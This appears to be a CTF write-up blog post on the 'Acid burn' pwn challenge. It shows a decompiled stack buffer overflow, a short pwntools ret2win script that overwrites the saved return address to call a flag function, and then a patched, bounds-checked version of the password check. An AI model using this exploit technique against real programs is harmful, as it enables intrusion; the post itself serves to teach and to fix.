+++
date = '2025-04-28T12:00:00+02:00'
draft = false
title = 'Acid burn'
tags = ['pwn']
+++

Here is the decompiled code for the challenge.

```c
int main(void)
{
  int iVar1;
  char input [64];

  printf("What is the password?\n?: ");
  fflush(stdout);
  /* reads up to 0x80 (128) bytes into the 64-byte buffer */
  fgets(input,0x80,stdin);
  iVar1 = strcmp(input,"password\n");
  if (iVar1 != 0) {
    puts("incorrect password");
    fflush(stdout);
  }
  return 0;
}
```

There is a pretty large buffer overflow on the `input` variable: `fgets` is allowed to read up to 0x80 (128) bytes into a 64-byte buffer. There is also, conveniently, a function called `flag` that displays the flag (and of course all the protections are disabled).

This is a classic ret2win scenario where we have to overwrite the saved return address to jump to the `flag` function.

A small Python script using pwntools should do the job.

```python
from pwn import *

# './challenge' is a placeholder path; the binary's name is not given in this post
elf = context.binary = ELF('./challenge')

def start():
    return process([elf.path])

io = start()

payload = flat(
    b'A'*(64+8),              # padding up to the saved return address
    pack(elf.symbols.flag))   # address of flag()
write("payload", payload)
io.sendlineafter(b'?: ', payload)
io.interactive()
```

I didn't save the flag, but this works and solves the challenge.
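
The root cause is the size passed to `fgets` (0x80) not matching the 64-byte buffer. As an added example (not code from the challenge or from this write-up), here is the same password check with the read bounded by `sizeof input` and over-long lines rejected; `check_password`, `stream_from` and the status enum are names assumed for the illustration, and the inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

enum pw_status { PW_OK, PW_WRONG, PW_TOO_LONG, PW_EOF };

/* Bounded replacement for fgets(input, 0x80, stdin): the size given to
 * fgets is always the real size of the destination buffer. */
enum pw_status check_password(FILE *in, const char *expected)
{
    char input[64];

    if (fgets(input, sizeof input, in) == NULL)
        return PW_EOF;

    size_t len = strlen(input);
    if (len > 0 && input[len - 1] == '\n') {
        input[len - 1] = '\0';              /* complete line: strip newline */
    } else if (!feof(in)) {
        /* No newline and not at end of input: fgets stopped because the
         * buffer was full. Drain the rest of the line and reject it. */
        int c;
        while ((c = getc(in)) != EOF && c != '\n')
            ;
        return PW_TOO_LONG;
    }
    return strcmp(input, expected) == 0 ? PW_OK : PW_WRONG;
}

/* Constructed helper for the demo: expose a byte string as a stream. */
FILE *stream_from(const char *data, size_t n)
{
    FILE *f = tmpfile();
    if (f != NULL) {
        fwrite(data, 1, n, f);
        rewind(f);
    }
    return f;
}

int main(void)
{
    char big[100];
    memset(big, 'A', sizeof big);           /* constructed over-long input */
    FILE *f = stream_from(big, sizeof big);
    if (f == NULL) return 1;
    printf("too long rejected: %d\n", check_password(f, "password") == PW_TOO_LONG);
    fclose(f);
    return 0;
}
```

Compiling with the protections the challenge disabled (stack protector, PIE, and ASLR on the host) is defence in depth on top of this fix, not a substitute for it.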